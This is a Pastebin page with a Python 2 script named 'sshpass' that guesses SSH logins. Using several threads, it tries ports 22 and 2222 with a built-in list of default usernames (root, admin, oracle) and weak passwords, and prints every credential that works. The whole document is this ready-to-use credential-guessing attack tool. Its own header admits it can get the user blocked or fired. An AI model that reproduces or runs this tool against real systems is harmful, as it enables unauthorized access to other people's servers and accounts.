Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################################
- #
- # sshpass v1.01
- #
- # simple application for guessing ssh protocol passwords. focuses less on brute
- # forcing which is tedious and boring (and not that effective these days), and more
- # on trying common passwords. it was more a chance for me to do some threading in
- # python... If you give it a big wordlist be prepared to wait a while.
- #
- # caution! this is a really good way to get blocked by firewalls or fired from work
- #
- # changelog:
- # 05/05/2016 - now with threading and queues :D
- #
- ###################################################################################
- import paramiko, sys, os, socket
- from threading import Thread
- from Queue import Queue, Empty
- class Password:
- '''create password objects to store on the queue accessed by each thread'''
- def __init__(self, host, port, username, password):
- self.host = host
- self.port = port
- self.username = username
- self.password = password
- def __str__(self):
- return self.host + ':' + self.port + ':' + self.username + ':' + self.password
- def ssh_connect(host, port, username, password, code=0):
- '''function performs ssh interaction'''
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- try:
- ssh.connect(host, port=int(port), username=username, password=password)
- except paramiko.AuthenticationException:
- code = 1 # auth fail
- except socket.error:
- code = 2 # connection fail
- ssh.close()
- return code
- def iterate(h, i, q):
- '''function runs through all the hosts we gave the app.
- the funky break statements are for performance, so the loops die
- if the password is found...'''
- ports = ['22', '2222']
- usernames = ['root', 'admin', 'oracle', 'test', 'user', 'ssh']
- passwords = ['1234', '12345', '123456', 'Password', 'Password1',
- 'password', 'password1', 'password123', 'root', 'toor', 'ssh']
- found = False
- for port in ports:
- # check if the port we want to try is open first...
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- result = sock.connect_ex((h, int(port)))
- if result == 0: # port is open!
- for u in usernames:
- for p in passwords:
- if ssh_connect(h, port, u, p) == 0:
- print '[*] ' + str(Password(h, port, u, p))
- q.put(Password(h, port, u, p))
- found == True
- break
- else:
- continue
- break
- else:
- continue
- break
- print '[i] Host finished: ' + h + ' (stopping thread: ' + str(i) + ')'
- i=0
- q = Queue()
- threads = []
- hosts = ['127.0.0.1']
- for h in hosts:
- i += 1
- t = Thread(target=iterate, args=(h, i, q))
- threads.append(t)
- for thread in threads:
- print '[i] Testing host: ' + h + ' (thread: ' + str(i) + ')'
- thread.start()
- for thread in threads:
- print '[i] (waiting for thread ' + str(i) + ' to finish)'
- thread.join()
- try:
- print '\n[*] Passwords recovered:'
- for elem in list(q.queue):
- print '\t' + str(elem)
- except Empty:
- print '[*] No passwords recovered :('
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement